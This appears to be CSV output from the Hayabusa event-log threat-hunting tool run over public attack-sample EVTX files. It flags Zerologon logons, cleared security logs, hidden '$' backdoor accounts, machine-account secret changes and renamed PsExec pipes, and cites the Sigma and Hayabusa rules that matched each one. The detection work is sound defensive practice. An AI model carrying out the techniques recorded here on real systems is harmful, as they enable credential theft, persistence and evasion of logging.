2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx
2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx
2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx
2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
